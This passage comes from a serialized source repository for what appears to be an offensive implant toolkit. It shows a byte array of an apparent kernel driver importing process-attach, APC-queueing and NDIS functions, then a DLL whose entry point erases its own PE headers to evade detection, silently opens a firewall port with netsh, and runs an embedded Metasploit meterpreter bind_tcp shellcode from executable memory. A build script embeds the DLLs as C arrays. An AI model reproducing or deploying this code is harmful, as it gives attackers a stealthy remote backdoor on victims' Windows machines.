,0x00,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,\r\n0x55,0x8b,0xec,0x83,0xec,0x20,0x83,0x3d,0x08,0x2e,0x00,0x10,0x00,0x74,0x05,0xe9,\r\n0xd7,0x00,0x00,0x00,0x83,0x7d,0x0c,0x00,0x0f,0x85,0xcd,0x00,0x00,0x00,0x8b,0x45,\r\n0x10,0x8b,0x08,0xc1,0xe9,0x08,0x83,0xe1,0x01,0x0f,0x84,0xbc,0x00,0x00,0x00,0xc6,\r\n0x45,0xff,0x00,0x8b,0x55,0x10,0x8b,0x42,0x04,0x89,0x45,0xf4,0x8b,0x4d,0x10,0x8b,\r\n0x51,0x0c,0x89,0x55,0xf8,0x8b,0x45,0xf8,0x50,0x8b,0x4d,0xf4,0x51,0x8b,0x55,0x08,\r\n0x52,0x68,0x90,0x0b,0x00,0x10,0xe8,0x87,0xd7,0xff,0xff,0x83,0xc4,0x10,0xc7,0x45,\r\n0xf0,0x00,0x00,0x00,0x00,0xeb,0x09,0x8b,0x45,0xf0,0x83,0xc0,0x01,0x89,0x45,0xf0,\r\n0x83,0x7d,0xf0,0x07,0x73,0x33,0x8b,0x4d,0xf0,0x8b,0x14,0x8d,0xa4,0x2d,0x00,0x10,\r\n0x52,0x8d,0x45,0xe8,0x50,0xff,0x15,0x20,0x03,0x00,0x10,0x6a,0x01,0x8d,0x4d,0xe8,\r\n0x51,0x8b,0x55,0x08,0x52,0xe8,0x86,0xdf,0xff,0xff,0x0f,0xb6,0xc0,0x85,0xc0,0x74,\r\n0x06,0xc6,0x45,0xff,0x01,0xeb,0x02,0xeb,0xbe,0x0f,0xb6,0x4d,0xff,0x85,0xc9,0x74,\r\n0x3a,0xc7,0x45,0xe4,0x00,0x00,0x00,0x00,0xc7,0x45,0xe0,0x00,0x00,0x00,0x00,0x8d,\r\n0x55,0xe0,0x52,0x8d,0x45,0xe4,0x50,0x8b,0x4d,0xf4,0x51,0xe8,0x60,0xfd,0xff,0xff,\r\n0x0f,0xb6,0xd0,0x85,0xd2,0x74,0x14,0x8b,0x45,0xf4,0x03,0x45,0xe4,0xa3,0x08,0x2e,\r\n0x00,0x10,0x8b,0x4d,0xf4,0x51,0xe8,0xc5,0xfc,0xff,0xff,0x8b,0xe5,0x5d,0xc2,0x0c,\r\n0x00,0x00,0x00,0x00,0x40,0x55,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,\r\n0x1e,0x59,0x00,0x00,0x90,0x02,0x00,0x00,0x30,0x55,0x00,0x00,0x00,0x00,0x00,0x00,\r\n0x00,0x00,0x00,0x00,0x70,0x59,0x00,0x00,0x80,0x02,0x00,0x00,0x00,0x00,0x00,0x00,\r\n0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,\r\n0x44,0x59,0x00,0x00,0x2c,0x59,0x00,0x00,0x5e,0x59,0x00,0x00,0x00,0x00,0x00,0x00,\r\n0x1c,0x56,0x00,0x00,0x30,0x56,0x00,0x00,0x48,0x56,0x00,0x00,0x66,0x56,0x00,0x00,\r\n0x82,0x56,0x00,0x00,0x9a,0x56,0x00,0x00,0xb0,0x56,0x00,0x00,0xba,0x56,0x00,0x00,\r\n0xd4,0x56,0x00,0x00,0xe8,0x56,0x00,0x00,0xf2,0x56,0x00,0x00,0x0c,0x57,0x00,0x00,\r\n0x26,0x57,0x00,0x00,0x3e,0x57,0x00,0x00,0x52,0x57,0x00,0x00,0x64,0x57,0x00,0x00,\r\n0x7c,0x57,0x00,0x00,0x0e,0x56,0x00,0x00,0xb0,0x57,0x00,0x00,0xc4,0x57,0x00,0x00,\r\n0xd4,0x57,0x00,0x00,0xe6,0x57,0x00,0x00,0x06,0x58,0x00,0x00,0x1a,0x58,0x00,0x00,\r\n0x24,0x58,0x00,0x00,0x2e,0x58,0x00,0x00,0x46,0x58,0x00,0x00,0x50,0x58,0x00,0x00,\r\n0x5a,0x58,0x00,0x00,0x76,0x58,0x00,0x00,0x98,0x58,0x00,0x00,0xb6,0x58,0x00,0x00,\r\n0xd2,0x58,0x00,0x00,0xea,0x58,0x00,0x00,0x0a,0x59,0x00,0x00,0x04,0x56,0x00,0x00,\r\n0xec,0x55,0x00,0x00,0x98,0x57,0x00,0x00,0xe0,0x55,0x00,0x00,0x00,0x00,0x00,0x00,\r\n0x3c,0x00,0x44,0x62,0x67,0x50,0x72,0x69,0x6e,0x74,0x00,0x00,0x5f,0x05,0x52,0x74,\r\n0x6c,0x49,0x6e,0x69,0x74,0x55,0x6e,0x69,0x63,0x6f,0x64,0x65,0x53,0x74,0x72,0x69,\r\n0x6e,0x67,0x00,0x00,0x80,0x07,0x6d,0x65,0x6d,0x73,0x65,0x74,0x00,0x00,0x2a,0x03,\r\n0x4b,0x65,0x53,0x65,0x74,0x45,0x76,0x65,0x6e,0x74,0x00,0x00,0x85,0x00,0x45,0x78,\r\n0x46,0x72,0x65,0x65,0x50,0x6f,0x6f,0x6c,0x57,0x69,0x74,0x68,0x54,0x61,0x67,0x00,\r\n0x41,0x04,0x4f,0x62,0x66,0x44,0x65,0x72,0x65,0x66,0x65,0x72,0x65,0x6e,0x63,0x65,\r\n0x4f,0x62,0x6a,0x65,0x63,0x74,0x00,0x00,0xa6,0x04,0x50,0x73,0x4c,0x6f,0x6f,0x6b,\r\n0x75,0x70,0x50,0x72,0x6f,0x63,0x65,0x73,0x73,0x42,0x79,0x50,0x72,0x6f,0x63,0x65,\r\n0x73,0x73,0x49,0x64,0x00,0x00,0xa8,0x04,0x50,0x73,0x4c,0x6f,0x6f,0x6b,0x75,0x70,\r\n0x54,0x68,0x72,0x65,0x61,0x64,0x42,0x79,0x54,0x68,0x72,0x65,0x61,0x64,0x49,0x64,\r\n0x00,0x00,0x25,0x05,0x52,0x74,0x6c,0x45,0x71,0x75,0x61,0x6c,0x55,0x6e,0x69,0x63,\r\n0x6f,0x64,0x65,0x53,0x74,0x72,0x69,0x6e,0x67,0x00,0xd2,0x06,0x5a,0x77,0x46,0x72,\r\n0x65,0x65,0x56,0x69,0x72,0x74,0x75,0x61,0x6c,0x4d,0x65,0x6d,0x6f,0x72,0x79,0x00,\r\n0x7e,0x07,0x6d,0x65,0x6d,0x63,0x70,0x79,0x00,0x00,0x98,0x06,0x5a,0x77,0x41,0x6c,\r\n0x6c,0x6f,0x63,0x61,0x74,0x65,0x56,0x69,0x72,0x74,0x75,0x61,0x6c,0x4d,0x65,0x6d,\r\n0x6f,0x72,0x79,0x00,0x58,0x07,0x5f,0x65,0x78,0x63,0x65,0x70,0x74,0x5f,0x68,0x61,\r\n0x6e,0x64,0x6c,0x65,0x72,0x33,0x00,0x00,0xad,0x06,0x5a,0x77,0x43,0x6c,0x6f,0x73,\r\n0x65,0x00,0x42,0x03,0x4b,0x65,0x55,0x6e,0x73,0x74,0x61,0x63,0x6b,0x44,0x65,0x74,\r\n0x61,0x63,0x68,0x50,0x72,0x6f,0x63,0x65,0x73,0x73,0x00,0x00,0xb7,0x02,0x4b,0x65,\r\n0x44,0x65,0x6c,0x61,0x79,0x45,0x78,0x65,0x63,0x75,0x74,0x69,0x6f,0x6e,0x54,0x68,\r\n0x72,0x65,0x61,0x64,0x00,0x00,0x48,0x03,0x4b,0x65,0x57,0x61,0x69,0x74,0x46,0x6f,\r\n0x72,0x53,0x69,0x6e,0x67,0x6c,0x65,0x4f,0x62,0x6a,0x65,0x63,0x74,0x00,0xe8,0x02,\r\n0x4b,0x65,0x49,0x6e,0x73,0x65,0x72,0x74,0x51,0x75,0x65,0x75,0x65,0x41,0x70,0x63,\r\n0x00,0x00,0xd5,0x02,0x4b,0x65,0x49,0x6e,0x69,0x74,0x69,0x61,0x6c,0x69,0x7a,0x65,\r\n0x41,0x70,0x63,0x00,0x39,0x03,0x4b,0x65,0x53,0x74,0x61,0x63,0x6b,0x41,0x74,0x74,\r\n0x61,0x63,0x68,0x50,0x72,0x6f,0x63,0x65,0x73,0x73,0x00,0x00,0x05,0x07,0x5a,0x77,\r\n0x51,0x75,0x65,0x72,0x79,0x49,0x6e,0x66,0x6f,0x72,0x6d,0x61,0x74,0x69,0x6f,0x6e,\r\n0x50,0x72,0x6f,0x63,0x65,0x73,0x73,0x00,0x34,0x04,0x4f,0x62,0x4f,0x70,0x65,0x6e,\r\n0x4f,0x62,0x6a,0x65,0x63,0x74,0x42,0x79,0x50,0x6f,0x69,0x6e,0x74,0x65,0x72,0x00,\r\n0xd9,0x02,0x4b,0x65,0x49,0x6e,0x69,0x74,0x69,0x61,0x6c,0x69,0x7a,0x65,0x45,0x76,\r\n0x65,0x6e,0x74,0x00,0x54,0x05,0x52,0x74,0x6c,0x47,0x65,0x74,0x56,0x65,0x72,0x73,\r\n0x69,0x6f,0x6e,0x00,0x6a,0x00,0x45,0x78,0x41,0x6c,0x6c,0x6f,0x63,0x61,0x74,0x65,\r\n0x50,0x6f,0x6f,0x6c,0x00,0x00,0x9b,0x03,0x4d,0x6d,0x4d,0x61,0x70,0x4c,0x6f,0x63,\r\n0x6b,0x65,0x64,0x50,0x61,0x67,0x65,0x73,0x53,0x70,0x65,0x63,0x69,0x66,0x79,0x43,\r\n0x61,0x63,0x68,0x65,0x00,0x00,0xef,0x04,0x52,0x74,0x6c,0x43,0x6f,0x6d,0x70,0x61,\r\n0x72,0x65,0x4d,0x65,0x6d,0x6f,0x72,0x79,0x00,0x00,0x88,0x07,0x73,0x74,0x72,0x63,\r\n0x6d,0x70,0x00,0x00,0x84,0x07,0x73,0x70,0x72,0x69,0x6e,0x74,0x66,0x00,0x69,0x04,\r\n0x50,0x73,0x43,0x72,0x65,0x61,0x74,0x65,0x53,0x79,0x73,0x74,0x65,0x6d,0x54,0x68,\r\n0x72,0x65,0x61,0x64,0x00,0x00,0x8a,0x07,0x73,0x74,0x72,0x6c,0x65,0x6e,0x00,0x00,\r\n0x89,0x07,0x73,0x74,0x72,0x63,0x70,0x79,0x00,0x00,0x31,0x03,0x4b,0x65,0x53,0x65,\r\n0x74,0x53,0x79,0x73,0x74,0x65,0x6d,0x41,0x66,0x66,0x69,0x6e,0x69,0x74,0x79,0x54,\r\n0x68,0x72,0x65,0x61,0x64,0x00,0xb0,0x04,0x50,0x73,0x52,0x65,0x6d,0x6f,0x76,0x65,\r\n0x4c,0x6f,0x61,0x64,0x49,0x6d,0x61,0x67,0x65,0x4e,0x6f,0x74,0x69,0x66,0x79,0x52,\r\n0x6f,0x75,0x74,0x69,0x6e,0x65,0x00,0x00,0xbf,0x04,0x50,0x73,0x53,0x65,0x74,0x4c,\r\n0x6f,0x61,0x64,0x49,0x6d,0x61,0x67,0x65,0x4e,0x6f,0x74,0x69,0x66,0x79,0x52,0x6f,\r\n0x75,0x74,0x69,0x6e,0x65,0x00,0x12,0x07,0x5a,0x77,0x51,0x75,0x65,0x72,0x79,0x53,\r\n0x79,0x73,0x74,0x65,0x6d,0x49,0x6e,0x66,0x6f,0x72,0x6d,0x61,0x74,0x69,0x6f,0x6e,\r\n0x00,0x00,0x40,0x05,0x52,0x74,0x6c,0x46,0x72,0x65,0x65,0x55,0x6e,0x69,0x63,0x6f,\r\n0x64,0x65,0x53,0x74,0x72,0x69,0x6e,0x67,0x00,0x00,0xdb,0x04,0x52,0x74,0x6c,0x41,\r\n0x6e,0x73,0x69,0x53,0x74,0x72,0x69,0x6e,0x67,0x54,0x6f,0x55,0x6e,0x69,0x63,0x6f,\r\n0x64,0x65,0x53,0x74,0x72,0x69,0x6e,0x67,0x00,0x00,0x5b,0x05,0x52,0x74,0x6c,0x49,\r\n0x6e,0x69,0x74,0x41,0x6e,0x73,0x69,0x53,0x74,0x72,0x69,0x6e,0x67,0x00,0x6e,0x74,\r\n0x6f,0x73,0x6b,0x72,0x6e,0x6c,0x2e,0x65,0x78,0x65,0x00,0x00,0x80,0x01,0x4e,0x64,\r\n0x69,0x73,0x52,0x65,0x67,0x69,0x73,0x74,0x65,0x72,0x50,0x72,0x6f,0x74,0x6f,0x63,\r\n0x6f,0x6c,0x00,0x00,0x69,0x00,0x4e,0x64,0x69,0x73,0x44,0x65,0x72,0x65,0x67,0x69,\r\n0x73,0x74,0x65,0x72,0x50,0x72,0x6f,0x74,0x6f,0x63,0x6f,0x6c,0x00,0x00,0xb8,0x00,\r\n0x4e,0x64,0x69,0x73,0x47,0x65,0x74,0x56,0x65,0x72,0x73,0x69,0x6f,0x6e,0x00,0x00,\r\n0x4e,0x44,0x49,0x53,0x2e,0x53,0x59,0x53,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,\r\n0x00,0x00,0x00,0x00,0x0c,0x00,0x00,0x00,0xa4,0x3e,0xa8,0x3e,0x00,0x10,0x00,0x00,\r\n0xf8,0x00,0x00,0x00,0x48,0x30,0x50,0x30,0x7b,0x30,0x82,0x30,0x89,0x30,0x90,0x30,\r\n0x97,0x30,0x9e,0x30,0xa5,0x30,0xac,0x30,0xb3,0x30,0xba,0x30,0xc1,0x30,0xc8,0x30,\r\n0xcf,0x30,0xd6,0x30,0xdd,0x30,0xe2,0x30,0xec,0x30,0x03,0x31,0x0d,0x31,0x1c,0x31,\r\n0x2d,0x31,0x46,0x31,0x55,0x31,0x60,0x31,0x66,0x31,0x8f,0x31,0xab,0x31,0x52,0x33,\r\n0x5a,0x33,0xb4,0x33,0xc5,0x33,0xcb,0x33,0xfa,0x33,0x63,0x34,0x96,0x34,0xb2,0x34,\r\n0xc4,0x34,0xdd,0x34,0xef,0x34,0x22,0x35,0x3e,0x35,0x6d,0x35,0x86,0x35,0x8b,0x35,\r\n0xd9,0x35,0xef,0x35,0xe6,0x36,0x0a,0x37,0x15,0x37,0x46,0x37,0x4b,0x37,0x8b,0x37,\r\n0xac,0x37,0xbe,0x37,0xd9,0x37,0x31,0x38,0x45,0x38,0x71,0x38,0x87,0x38,0x69,0x39,\r\n0x81,0x39,0x93,0x39,0xa6,0x39,0xc0,0x39,0xed,0x39,0xf3,0x39,0x04,0x3a,0x19,0x3a,\r\n0x36,0x3a,0x3d,0x3a,0x50,0x3a,0x6f,0x3a,0x88,0x3a,0x92,0x3a,0x9d,0x3a,0x0f,0x3b,\r\n0x18,0x3b,0x23,0x3b,0x8f,0x3b,0x98,0x3b,0xa3,0x3b,0xdc,0x3b,0xff,0x3b,0x09,0x3c,\r\n0x2a,0x3c,0x34,0x3c,0x4e,0x3c,0x7c,0x3c,0x88,0x3c,0x92,0x3c,0xb0,0x3c,0xba,0x3c,\r\n0xc5,0x3c,0xd7,0x3c,0xdd,0x3c,0xee,0x3c,0xf4,0x3c,0x06,0x3d,0x1b,0x3d,0x30,0x3d,\r\n0x36,0x3d,0x40,0x3d,0x4a,0x3d,0x54,0x3d,0x5e,0x3d,0x68,0x3d,0x72,0x3d,0x7c,0x3d,\r\n0x96,0x3d,0x9b,0x3d,0x17,0x3e,0x44,0x3e,0x8c,0x3e,0xcb,0x3e,0x0c,0x3f,0x6e,0x3f,\r\n0x9b,0x3f,0xd1,0x3f,0x00,0x20,0x00,0x00,0xf4,0x00,0x00,0x00,0x10,0x30,0x51,0x30,\r\n0xba,0x30,0x57,0x31,0x6c,0x31,0x78,0x31,0xbb,0x31,0xc5,0x31,0xe2,0x31,0x09,0x32,\r\n0x1a,0x32,0x21,0x33,0x26,0x33,0x33,0x33,0x45,0x33,0x4e,0x33,0x56,0x33,0x5d,0x33,\r\n0x63,0x33,0xb7,0x34,0xc6,0x34,0x10,0x35,0x27,0x35,0x3d,0x35,0x52,0x35,0x65,0x35,\r\n0x70,0x35,0xb5,0x35,0xc2,0x35,0xda,0x35,0xec,0x35,0x05,0x36,0x16,0x36,0x55,0x36,\r\n0x5b,0x36,0x70,0x36,0x83,0x36,0x89,0x36,0xc8,0x36,0xd7,0x36,0x34,0x37,0x3d,0x37,\r\n0x51,0x37,0x58,0x37,0x5e,0x37,0x6f,0x37,0x7d,0x37,0x82,0x37,0x88,0x37,0x9a,0x37,\r\n0x30,0x3b,0x3e,0x3b,0x6a,0x3b,0x82,0x3b,0xb7,0x3b,0xd1,0x3b,0xe4,0x3b,0xea,0x3b,\r\n0xf0,0x3b,0xf6,0x3b,0xfc,0x3b,0x02,0x3c,0x08,0x3c,0x0e,0x3c,0x14,0x3c,0x1a,0x3c,\r\n0x20,0x3c,0x26,0x3c,0x2c,0x3c,0x32,0x3c,0x38,0x3c,0x3e,0x3c,0x44,0x3c,0x4a,0x3c,\r\n0x50,0x3c,0x56,0x3c,0x5c,0x3c,0x62,0x3c,0x68,0x3c,0x6e,0x3c,0x74,0x3c,0x7a,0x3c,\r\n0x80,0x3c,0x86,0x3c,0x8c,0x3c,0x92,0x3c,0x98,0x3c,0x9e,0x3c,0xa4,0x3c,0xaa,0x3c,\r\n0xb0,0x3c,0xb6,0x3c,0xbc,0x3c,0xc2,0x3c,0xc8,0x3c,0xce,0x3c,0xd4,0x3c,0xda,0x3c,\r\n0xe4,0x3c,0xe8,0x3c,0xf4,0x3c,0xf8,0x3c,0x08,0x3d,0xa4,0x3d,0xa8,0x3d,0xac,0x3d,\r\n0xb0,0x3d,0xb4,0x3d,0xb8,0x3d,0xbc,0x3d,0x97,0x3e,0xaa,0x3e,0xbf,0x3e,0xee,0x3e,\r\n0xfd,0x3e,0x18,0x3f,0xc2,0x3f,0x00,0x00,0x00,0x30,0x00,0x00,0x6c,0x00,0x00,0x00,\r\n0x2d,0x30,0xf8,0x30,0x60,0x31,0x6a,0x31,0x8d,0x31,0xd9,0x31,0xea,0x31,0x00,0x32,\r\n0x16,0x32,0x48,0x32,0x57,0x32,0x74,0x32,0x11,0x36,0x1b,0x36,0x20,0x36,0x2a,0x36,\r\n0x31,0x36,0x38,0x36,0x3f,0x36,0x46,0x36,0x4d,0x36,0x54,0x36,0x5b,0x36,0x62,0x36,\r\n0x69,0x36,0x70,0x36,0x92,0x36,0xa2,0x36,0xff,0x36,0x0f,0x37,0x2c,0x37,0x5d,0x37,\r\n0x6d,0x37,0xa0,0x37,0xd4,0x37,0xe7,0x37,0x17,0x38,0x3b,0x38,0x52,0x38,0x5e,0x38,\r\n0xae,0x38,0xb9,0x38,0xc4,0x38,0xe0,0x38,0xe6,0x38,0xf3,0x38,0x0a,0x39,0x1b,0x39,\r\n0x39,0x39,0x00,0x00,0x00,0x40,0x00,0x00,0x14,0x00,0x00,0x00,0x7e,0x3f,0x91,0x3f,\r\n0xa6,0x3f,0xb7,0x3f,0xd6,0x3f,0xf7,0x3f,0x00,0x50,0x00,0x00,0x58,0x00,0x00,0x00,\r\n0x2e,0x30,0x33,0x30,0x4f,0x30,0x5b,0x30,0x68,0x30,0x6e,0x30,0x78,0x30,0x89,0x30,\r\n0x92,0x30,0xa5,0x30,0xab,0x30,0xbe,0x30,0xc4,0x30,0xd9,0x30,0xe3,0x30,0xe9,0x30,\r\n0xfd,0x30,0x03,0x31,0x18,0x31,0x29,0x31,0x3f,0x31,0x49,0x31,0x63,0x31,0x76,0x31,\r\n0x81,0x31,0x95,0x31,0xd5,0x31,0xe6,0x31,0xfb,0x31,0x0c,0x32,0x15,0x32,0xb4,0x32,\r\n0x76,0x33,0x85,0x33,0x08,0x34,0x52,0x34,0x7c,0x34,0x87,0x34,0xde,0x34,0x00,0x00,\r\n0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,\r\n0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,\r\n0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00\r\n};" }, { "path": "src/meterpreter/dllmain.cpp", "content": "#include \"stdafx.h\"\r\n\r\n#include \"../meterpreter_config.h\"\r\n\r\n#pragma comment(linker,\"/ENTRY:DllMain\")\r\n#pragma comment(linker,\"/NODEFAULTLIB\")\r\n//--------------------------------------------------------------------------------------\r\nDWORD WINAPI ShellcodeThread(LPVOID lpParam)\r\n{\r\n typedef DWORD (WINAPI * SHELLCODE)(void); \r\n SHELLCODE Shellcode = (SHELLCODE)lpParam;\r\n\r\n // call shellcode\r\n return Shellcode(); \r\n}\r\n//--------------------------------------------------------------------------------------\r\nDWORD WINAPI MainThread(LPVOID lpParam)\r\n{\r\n DWORD dwExit = 0;\r\n\r\n DbgMsg(\r\n __FILE__, __LINE__, __FUNCTION__\"(): Thread %x:%x started\\n\", \r\n GetCurrentProcessId(), GetCurrentThreadId()\r\n );\r\n\r\n DbgMsg(__FILE__, __LINE__, __FUNCTION__\"(): Adding firewall rule for TCP port %d...\\n\", LISTEN_PORT);\r\n\r\n // add firewall rule to allow connections on meterpreter port\r\n char szCommandLine[MAX_PATH];\r\n wsprintf(szCommandLine, \"cmd.exe /C netsh firewall add portopening TCP %d \" FIREWALL_RULE_NAME, LISTEN_PORT);\r\n UINT ExitCode = WinExec(szCommandLine, SW_HIDE);\r\n\r\n DbgMsg(__FILE__, __LINE__, __FUNCTION__\"(): Done (exit code: %d)\\n\", ExitCode);\r\n\r\n // allocate memory for shellcode\r\n PVOID Buff = VirtualAlloc(NULL, sizeof(PAYLOAD), MEM_RESERVE | MEM_COMMIT, PAGE_EXECUTE_READWRITE);\r\n if (Buff)\r\n {\r\n DbgMsg(\r\n __FILE__, __LINE__, __FUNCTION__\"(): Allocated %d bytes for payload at 0x%x\\n\", \r\n sizeof(PAYLOAD), Buff\r\n );\r\n\r\n // copy shellcode\r\n RtlCopyMemory(Buff, PAYLOAD, sizeof(PAYLOAD));\r\n\r\n // run payload in separate thread\r\n HANDLE hThread = CreateThread(NULL, 0, ShellcodeThread, Buff, 0, NULL);\r\n if (hThread)\r\n {\r\n WaitForSingleObject(hThread, INFINITE);\r\n CloseHandle(hThread);\r\n }\r\n else\r\n {\r\n DbgMsg(__FILE__, __LINE__, \"CreateThread() ERROR %d\\n\", GetLastError());\r\n }\r\n\r\n VirtualFree(Buff, 0, MEM_RELEASE);\r\n }\r\n else\r\n {\r\n DbgMsg(__FILE__, __LINE__, \"VirtualAlloc() ERROR %d\\n\", GetLastError());\r\n }\r\n\r\n // delete firewall rule\r\n DbgMsg(__FILE__, __LINE__, __FUNCTION__\"(): Deleting firewall rule...\\n\");\r\n ExitCode = WinExec(\"cmd.exe /C netsh advfirewall firewall delete rule name=\" FIREWALL_RULE_NAME, SW_HIDE);\r\n DbgMsg(__FILE__, __LINE__, __FUNCTION__\"(): Done (exit code: %d)\\n\", ExitCode);\r\n\r\n DbgMsg(__FILE__, __LINE__, __FUNCTION__\"(): EXIT\\n\");\r\n\r\n#ifdef _X86_\r\n\r\n // free DLL image and exit current thread\r\n __asm\r\n {\r\n push dwExit /* argument for ExitThread() */\r\n push MEM_RELEASE\r\n push 0\r\n push lpParam /* address to free */\r\n push dword ptr [ExitThread] /* ExitThread() as return address from VirtualFree() */\r\n mov eax, dword ptr [VirtualFree]\r\n jmp eax\r\n }\r\n\r\n#else // _X86_\r\n\r\n#error __FUNCTION__ is x86 only\r\n\r\n#endif // _X86_\r\n\r\n return dwExit;\r\n}\r\n//--------------------------------------------------------------------------------------\r\nvoid my_memset(void *mem, unsigned char val, size_t size)\r\n{\r\n for (size_t i = 0; i < size; i++)\r\n {\r\n ((unsigned char *)mem)[i] = i;\r\n }\r\n\r\n for (size_t i = 0; i < size; i++)\r\n {\r\n ((unsigned char *)mem)[i] ^= i;\r\n ((unsigned char *)mem)[i] += val;\r\n }\r\n}\r\n//--------------------------------------------------------------------------------------\r\nBOOL APIENTRY DllMain(\r\n HMODULE hModule,\r\n DWORD ul_reason_for_call,\r\n LPVOID lpReserved)\r\n{\r\n switch (ul_reason_for_call)\r\n {\r\n case DLL_PROCESS_ATTACH:\r\n {\r\n char szProcessPath[MAX_PATH], szProcessUser[MAX_PATH];\r\n DWORD dwUserLen = MAX_PATH;\r\n\r\n GetModuleFileName(GetModuleHandle(NULL), szProcessPath, MAX_PATH);\r\n GetUserName(szProcessUser, &dwUserLen);\r\n\r\n DbgMsg(\r\n __FILE__, __LINE__, __FUNCTION__\"(): Injected into process \\\"%s\\\" (PID=%d), User = \\\"%s\\\"\\n\",\r\n szProcessPath, GetCurrentProcessId(), szProcessUser\r\n );\r\n\r\n PIMAGE_NT_HEADERS32 pHeaders = (PIMAGE_NT_HEADERS32)\r\n ((PUCHAR)hModule + ((PIMAGE_DOS_HEADER)hModule)->e_lfanew);\r\n\r\n DWORD dwOldProt = 0;\r\n if (VirtualProtect(hModule, pHeaders->OptionalHeader.SizeOfHeaders, PAGE_READWRITE, &dwOldProt))\r\n {\r\n // erase image headers\r\n my_memset(hModule, 0, pHeaders->OptionalHeader.SizeOfHeaders);\r\n }\r\n\r\n // run payload in separate thread\r\n HANDLE hThread = CreateThread(NULL, 0, MainThread, (PVOID)hModule, 0, NULL);\r\n if (hThread)\r\n {\r\n CloseHandle(hThread);\r\n }\r\n else\r\n {\r\n DbgMsg(__FILE__, __LINE__, \"CreateThread() ERROR %d\\n\", GetLastError());\r\n }\r\n\r\n break;\r\n }\r\n\r\n case DLL_THREAD_ATTACH:\r\n case DLL_THREAD_DETACH:\r\n case DLL_PROCESS_DETACH:\r\n {\r\n break;\r\n }\r\n }\r\n\r\n return TRUE;\r\n}\r\n//--------------------------------------------------------------------------------------\r\nvoid Dummy(void)\r\n{\r\n MessageBox(0, \" to exit...\", __FUNCTION__\"()\", MB_ICONINFORMATION);\r\n ExitProcess(0);\r\n}\r\n//--------------------------------------------------------------------------------------\r\n// EoF\r\n" }, { "path": "src/meterpreter/meterpreter.cpp", "content": "// meterpreter.cpp : Defines the exported functions for the DLL application.\r\n//\r\n\r\n#include \"stdafx.h\"\r\n" }, { "path": "src/meterpreter/meterpreter.def", "content": "EXPORTS\r\nDummy" }, { "path": "src/meterpreter/meterpreter.vcproj", "content": "\r\n\r\n\t\r\n\t\t\r\n\t\r\n\t\r\n\t\r\n\t\r\n\t\t\r\n\t\t\t\r\n\t\t\t\r\n\t\t\t\r\n\t\t\t\r\n\t\t\t\r\n\t\t\t\r\n\t\t\t\r\n\t\t\t\r\n\t\t\t\r\n\t\t\t\r\n\t\t\t\r\n\t\t\t\r\n\t\t\t\r\n\t\t\t\r\n\t\t\t\r\n\t\t\t\r\n\t\t\t\r\n\t\t\r\n\t\t\r\n\t\t\t\r\n\t\t\t\r\n\t\t\t\r\n\t\t\t\r\n\t\t\t\r\n\t\t\t\r\n\t\t\t\r\n\t\t\t\r\n\t\t\t\r\n\t\t\t\r\n\t\t\t\r\n\t\t\t\r\n\t\t\t\r\n\t\t\t\r\n\t\t\t\r\n\t\t\t\r\n\t\t\t\r\n\t\t\r\n\t\r\n\t\r\n\t\r\n\t\r\n\t\t\r\n\t\t\t\r\n\t\t\t\r\n\t\t\t\r\n\t\t\t\t\r\n\t\t\t\t\t\r\n\t\t\t\t\r\n\t\t\t\t\r\n\t\t\t\t\t\r\n\t\t\t\t\r\n\t\t\t\r\n\t\t\t\r\n\t\t\t\r\n\t\t\t\r\n\t\t\t\t\r\n\t\t\t\t\t\r\n\t\t\t\t\r\n\t\t\t\t\r\n\t\t\t\t\t\r\n\t\t\t\t\r\n\t\t\t\r\n\t\t\r\n\t\t\r\n\t\t\t\r\n\t\t\t\r\n\t\t\t\r\n\t\t\t\r\n\t\t\t\r\n\t\t\t\r\n\t\t\r\n\t\t\r\n\t\t\r\n\t\r\n\t\r\n\t\r\n\r\n" }, { "path": "src/meterpreter/post_build.bat", "content": "@echo off\r\nif exist ..\\meterpreter_debug.dll ..\\bin2c.exe ..\\meterpreter_debug.dll dll > ..\\includes\\meterpreter_debug.dll.h\r\nif exist ..\\meterpreter.dll ..\\bin2c.exe ..\\meterpreter.dll dll > ..\\includes\\meterpreter.dll.h\r\npause" }, { "path": "src/meterpreter/stdafx.cpp", "content": "// stdafx.cpp : source file that includes just the standard includes\r\n// meterpreter.pch will be the pre-compiled header\r\n// stdafx.obj will contain the pre-compiled type information\r\n\r\n#include \"stdafx.h\"\r\n\r\n// TODO: reference any additional headers you need in STDAFX.H\r\n// and not in this file\r\n" }, { "path": "src/meterpreter/stdafx.h", "content": "#pragma once\r\n\r\n#include \"targetver.h\"\r\n\r\n#define WIN32_LEAN_AND_MEAN // Exclude rarely-used stuff from Windows headers\r\n\r\n#include \r\n\r\n#include \"../common/debug.h\"\r\n" }, { "path": "src/meterpreter/targetver.h", "content": "#pragma once\r\n\r\n// The following macros define the minimum required platform. The minimum required platform\r\n// is the earliest version of Windows, Internet Explorer etc. that has the necessary features to run \r\n// your application. The macros work by enabling all features available on platform versions up to and \r\n// including the version specified.\r\n\r\n// Modify the following defines if you have to target a platform prior to the ones specified below.\r\n// Refer to MSDN for the latest info on corresponding values for different platforms.\r\n#ifndef WINVER // Specifies that the minimum required platform is Windows Vista.\r\n#define WINVER 0x0600 // Change this to the appropriate value to target other versions of Windows.\r\n#endif\r\n\r\n#ifndef _WIN32_WINNT // Specifies that the minimum required platform is Windows Vista.\r\n#define _WIN32_WINNT 0x0600 // Change this to the appropriate value to target other versions of Windows.\r\n#endif\r\n\r\n#ifndef _WIN32_WINDOWS // Specifies that the minimum required platform is Windows 98.\r\n#define _WIN32_WINDOWS 0x0410 // Change this to the appropriate value to target Windows Me or later.\r\n#endif\r\n\r\n#ifndef _WIN32_IE // Specifies that the minimum required platform is Internet Explorer 7.0.\r\n#define _WIN32_IE 0x0700 // Change this to the appropriate value to target other versions of IE.\r\n#endif\r\n" }, { "path": "src/meterpreter_bind_tcp.h", "content": "/*\n * windows/meterpreter/bind_tcp - 298 bytes (stage 1)\n * http://www.metasploit.com\n * VERBOSE=false, LPORT=4444, RHOST=, 